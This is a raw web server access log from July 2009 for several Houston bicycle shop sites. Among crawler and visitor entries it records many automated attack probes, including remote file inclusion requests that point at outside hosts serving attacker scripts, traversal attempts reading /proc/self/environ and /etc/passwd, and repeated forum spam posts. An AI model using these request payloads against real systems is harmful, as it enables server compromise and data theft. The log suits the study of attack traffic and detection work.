72.30.78.239 - - [13/Jul/2009:05:37:20 -0700] "GET /bullitinboard/viewtopic.php?p=4044 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
208.80.195.34 - - [13/Jul/2009:06:06:57 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {41697FC0-CDC0-CFB3-F195-F57FEC2B2253})" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:06:17:34 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
72.30.78.239 - - [13/Jul/2009:06:20:07 -0700] "GET /bullitinboard/viewtopic.php?p=15375 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
83.143.134.34 - - [13/Jul/2009:06:26:27 -0700] "GET /logs/access.log/index.php?page=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:06:27:14 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:06:27:15 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:06:27:15 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:06:27:16 -0700] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:06:27:17 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:06:29:17 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
89.223.3.98 - - [13/Jul/2009:06:33:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.223.3.98 - - [13/Jul/2009:06:33:36 -0700] "GET /skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.223.3.98 - - [13/Jul/2009:06:33:36 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.223.3.98 - - [13/Jul/2009:06:33:36 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.223.3.98 - - [13/Jul/2009:06:33:36 -0700] "GET /skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.223.3.98 - - [13/Jul/2009:06:33:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:06:35:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
89.223.3.98 - - [13/Jul/2009:06:43:12 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.223.3.98 - - [13/Jul/2009:06:43:16 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.143.134.34 - - [13/Jul/2009:06:51:08 -0700] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
220.181.7.96 - - [13/Jul/2009:06:54:06 -0700] "GET /bullitinboard/viewtopic.php?p=15678 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:07:01:31 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:07:01:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:07:10:10 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:07:13:21 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:07:16:12 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.142.209.134 - - [13/Jul/2009:07:17:15 -0700] "GET /skin/zero_vote/login.php?dir=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.209.134 - - [13/Jul/2009:07:17:15 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.209.134 - - [13/Jul/2009:07:17:15 -0700] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:07:19:08 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
131.203.76.246 - - [13/Jul/2009:07:19:58 -0700] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
131.203.76.246 - - [13/Jul/2009:07:19:58 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
131.203.76.246 - - [13/Jul/2009:07:19:58 -0700] "GET /skin/zero_vote/login.php?dir=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:07:28:48 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:07:40:59 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
211.255.23.47 - - [13/Jul/2009:07:43:00 -0700] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
211.255.23.47 - - [13/Jul/2009:07:43:00 -0700] "GET /logs/access.log/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
211.255.23.47 - - [13/Jul/2009:07:43:00 -0700] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
211.245.23.158 - - [13/Jul/2009:07:43:50 -0700] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.245.23.158 - - [13/Jul/2009:07:43:51 -0700] "GET /logs/access.log/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.245.23.158 - - [13/Jul/2009:07:43:51 -0700] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
58.61.164.207 - - [13/Jul/2009:07:46:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://houstonbikeshop.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:07:46:57 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
65.55.106.172 - - [13/Jul/2009:07:55:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
91.142.209.134 - - [13/Jul/2009:07:58:28 -0700] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.205.80.66 - - [13/Jul/2009:08:05:59 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
65.205.80.66 - - [13/Jul/2009:08:06:00 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
216.171.219.189 - - [13/Jul/2009:08:06:28 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
216.171.219.189 - - [13/Jul/2009:08:06:28 -0700] "GET /logs/access.log%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
216.171.219.189 - - [13/Jul/2009:08:06:28 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:15:30 -0700] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:15:30 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:15:30 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:15:30 -0700] "GET /logs/access.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:15:31 -0700] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:15:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:15:31 -0700] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:15:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:16:32 -0700] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:16:33 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:16:33 -0700] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
190.244.84.231 - - [13/Jul/2009:08:16:34 -0700] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
116.127.121.12 - - [13/Jul/2009:08:21:12 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
116.127.121.12 - - [13/Jul/2009:08:21:13 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
116.127.121.12 - - [13/Jul/2009:08:21:15 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
116.127.121.12 - - [13/Jul/2009:08:26:30 -0700] "GET /logs/access.log%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:08:33:13 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:08:33:14 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:08:33:15 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:08:33:15 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:08:33:15 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
202.125.45.45 - - [13/Jul/2009:09:11:14 -0700] "GET /translations/Italian.txt//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
202.125.45.45 - - [13/Jul/2009:09:11:14 -0700] "GET /translations/Swedish.txt//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
202.125.45.45 - - [13/Jul/2009:09:11:14 -0700] "GET /include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
202.125.45.45 - - [13/Jul/2009:09:11:14 -0700] "GET /translations//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
202.125.45.45 - - [13/Jul/2009:09:13:10 -0700] "GET /include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.svbikes.com"
202.125.45.45 - - [13/Jul/2009:09:13:10 -0700] "GET /translations//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.svbikes.com"
208.80.195.34 - - [13/Jul/2009:09:14:53 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.3); .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "houstonbikeshop.com"
219.239.11.182 - - [13/Jul/2009:09:16:47 -0700] "GET /bullitinboard/viewtopic.php?t=2208&highlight= HTTP/1.1" 200 533 "http://www.legalcasinopoker.com/wwwluckystreetcasinocomhands.html" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC; AtHome021)" "www.svbikes.com"
202.125.45.45 - - [13/Jul/2009:09:22:11 -0700] "GET /translations/Italian.txt/index.php?entra=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
202.125.45.45 - - [13/Jul/2009:09:22:23 -0700] "GET /translations/index.php?entra=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
202.125.45.45 - - [13/Jul/2009:09:22:23 -0700] "GET /index.php?entra=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
82.194.87.219 - - [13/Jul/2009:09:26:26 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://webmaster-100.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
91.121.150.170 - - [13/Jul/2009:09:26:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:09:39:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
72.30.79.62 - - [13/Jul/2009:09:39:56 -0700] "GET /bullitinboard/viewtopic.php?p=14051 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:09:46:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
114.80.93.71 - - [13/Jul/2009:09:49:59 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:09:57:57 -0700] "GET /translations/French.txt//ws/get_events.php?includedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:09:57:57 -0700] "GET /translations/French.txt//ws/get_events.php?includedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:09:57:58 -0700] "GET /ws/get_events.php?includedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:09:57:59 -0700] "GET /ws/get_events.php?includedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:09:57:59 -0700] "GET /translations//ws/get_events.php?includedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.162.115.67 - - [13/Jul/2009:09:57:59 -0700] "GET /translations//ws/get_events.php?includedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
63.249.95.132 - - [13/Jul/2009:10:04:15 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:15 -0700] "GET /logs/access.log//errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:15 -0700] "GET /logs//errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:16 -0700] "GET /logs/access.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:16 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:16 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:16 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:16 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:16 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:16 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:16 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
63.249.95.132 - - [13/Jul/2009:10:04:16 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
99.59.212.206 - - [13/Jul/2009:10:10:20 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.svbikes.com"
99.59.212.206 - - [13/Jul/2009:10:10:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.svbikes.com"
99.59.212.206 - - [13/Jul/2009:10:10:26 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.svbikes.com"
99.59.212.206 - - [13/Jul/2009:10:10:26 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.svbikes.com"
81.19.66.38 - - [13/Jul/2009:10:12:36 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:10:12:37 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:10:12:37 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:10:12:38 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
